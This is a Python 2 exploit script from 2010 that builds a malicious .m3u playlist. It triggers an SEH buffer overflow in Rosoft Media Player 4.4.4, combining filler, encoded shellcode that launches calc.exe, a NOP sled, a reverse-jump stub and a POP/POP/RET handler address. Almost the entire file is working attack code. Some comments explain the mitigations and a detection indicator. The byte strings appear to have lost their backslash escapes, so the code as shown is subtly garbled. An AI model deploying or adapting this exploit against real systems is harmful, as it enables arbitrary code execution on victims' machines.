# Title : Rosoft media player 4.4.4 SEH Buffer Overflow
# Published : 2010-08-15
# Author : dijital1
#!/usr/bin/python
# #######################################################################
# Title: Rosoft media player 4.4.4 SEH buffer overflow
# Date: August 15, 2010
# Author: dijital1
# Original Advisory: http://www.exploit-db.com/exploits/14601 - abhishek lyall
# Download: http://www.exploit-db.com/application/14601/
# Platform: Windows XP SP3 EN Professional - VMware
# Greetz to: Corelan Security Team, Exploit-db, OffSec
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# Script body: prints a banner, assembles the crafted playlist contents and
# writes them to a single .m3u file in the current directory. The `print`
# statements below are Python 2 syntax; this file does not run unmodified
# under Python 3.
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print " -= Exploit for Rosoft media player 4.4.4 (SEH) - dijital1 =- "
# Name of the playlist file written at the end of the script (relative path,
# so it lands wherever the script is run from).
outputfile="exploit.m3u"
# Filler preceding the payload: 3470 repetitions of one byte. Together with
# the lengths of `shellcode`, `sled` and `revjump` this fixes where the
# SEH record (nseh/seh below) lands in the file, per the layout in `payload`.
junk="x41"*3470
# Next-SEH pointer slot: per the author's comment, a short backward jump.
nseh="xebx88x90x90" #reverse jump 118 bytes
# SEH handler slot: a POP/POP/RET address. Per the author, the address comes
# from the player's own executable and contains a null byte, so anything after
# it in the file is not copied; the whole payload therefore sits before it.
# NOTE(review): because the handler address is taken from the application
# binary itself, SafeSEH/SEHOP enforcement or an ASLR-enabled build of the
# player are the mitigations that would break this layout — not confirmable
# from this listing alone.
seh="x49xd4x46x00" # PPR - 0046D449 - Taken from the exe. The null byte terminates
# the copy but because we have a big area to work with prior to
# to reaching the SEH, this exploit is still possible.
# The following shellcode makes use of the GetPC technique for copying EIP into ECX.
# ECX is then adjusted to move execution 775 bytes earlier in the buffer. We need to
# to jump back further than what a short jump will allow hence the following...
#
# Referenced: phrack #62 Article 7 Originally written by Aaron Adams
#
# msfencode -i ./768bck.bin -e x86/alpha_upper -t c
# [*] x86/alpha_upper succeeded with size 107 (iteration=1)
# Second-stage jump stub (alphanumeric-upper encoded per the msfencode line
# above); it is placed just before nseh/seh in `payload`.
revjump=("x89xe7xdbxd7xd9x77xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4ex39x4ax4ex49x49x43x44"
"x51x34x4cx34x50x59x4bx30x4fx31x44x4ax4ax30x4b"
"x4ex48x4dx4bx4ex48x4dx4bx4ex48x4dx4bx4fx4dx31"
"x41x41")
# NOP sled between the main payload and the reverse jump shellcode
sled="x90"*60
# msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c
# [*] x86/alpha_upper succeeded with size 471 (iteration=1)
# Main payload (per the msfpayload line above: a proof-of-concept that
# launches calc.exe). Placed directly after `junk` in `payload`.
shellcode=("x89xe5xdbxc5xd9x75xf4x58x50x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4bx39x45x50"
"x45x50x45x50x43x50x4dx59x4bx55x46x51x49x42x45"
"x34x4cx4bx51x42x46x50x4cx4bx50x52x44x4cx4cx4b"
"x50x52x42x34x4cx4bx43x42x47x58x44x4fx4fx47x50"
"x4ax47x56x46x51x4bx4fx50x31x4fx30x4ex4cx47x4c"
"x43x51x43x4cx45x52x46x4cx47x50x4fx31x48x4fx44"
"x4dx45x51x4fx37x4bx52x4ax50x51x42x50x57x4cx4b"
"x51x42x44x50x4cx4bx51x52x47x4cx43x31x4ex30x4c"
"x4bx51x50x42x58x4dx55x4fx30x42x54x50x4ax43x31"
"x48x50x50x50x4cx4bx47x38x42x38x4cx4bx51x48x47"
"x50x43x31x4ex33x4ax43x47x4cx50x49x4cx4bx50x34"
"x4cx4bx43x31x48x56x50x31x4bx4fx46x51x49x50x4e"
"x4cx4fx31x48x4fx44x4dx43x31x4fx37x46x58x4bx50"
"x43x45x4ax54x44x43x43x4dx4bx48x47x4bx43x4dx47"
"x54x42x55x4dx32x50x58x4cx4bx51x48x51x34x43x31"
"x49x43x45x36x4cx4bx44x4cx50x4bx4cx4bx51x48x45"
"x4cx45x51x48x53x4cx4bx45x54x4cx4bx45x51x48x50"
"x4cx49x50x44x47x54x47x54x51x4bx51x4bx45x31x46"
"x39x51x4ax50x51x4bx4fx4bx50x50x58x51x4fx50x5a"
"x4cx4bx42x32x4ax4bx4dx56x51x4dx43x5ax43x31x4c"
"x4dx4cx45x48x39x45x50x45x50x45x50x46x30x42x48"
"x50x31x4cx4bx42x4fx4bx37x4bx4fx49x45x4fx4bx4a"
"x50x48x35x4fx52x46x36x45x38x49x36x4ax35x4fx4d"
"x4dx4dx4bx4fx4ex35x47x4cx45x56x43x4cx44x4ax4d"
"x50x4bx4bx4bx50x42x55x44x45x4fx4bx47x37x44x53"
"x44x32x42x4fx42x4ax43x30x46x33x4bx4fx49x45x45"
"x33x45x31x42x4cx42x43x46x4ex42x45x44x38x43x55"
"x45x50x45x5ax41x41")
# File layout, front to back: filler, main payload, NOP sled, backward-jump
# stub, then the SEH record (next pointer, handler address). From a defender's
# view, a playlist of this size consisting mostly of one repeated byte is an
# easy file-level indicator for this class of crafted .m3u.
payload=junk+shellcode+sled+revjump+nseh+seh
# Written in text mode ("w") without a context manager; on Windows, text mode
# would translate any newline byte in the data, so a binary mode would be the
# safer choice for raw bytes — left as published.
FILE = open(outputfile, "w")
FILE.write(payload)
FILE.close()
print "nExploit written to: " + outputfile + "n"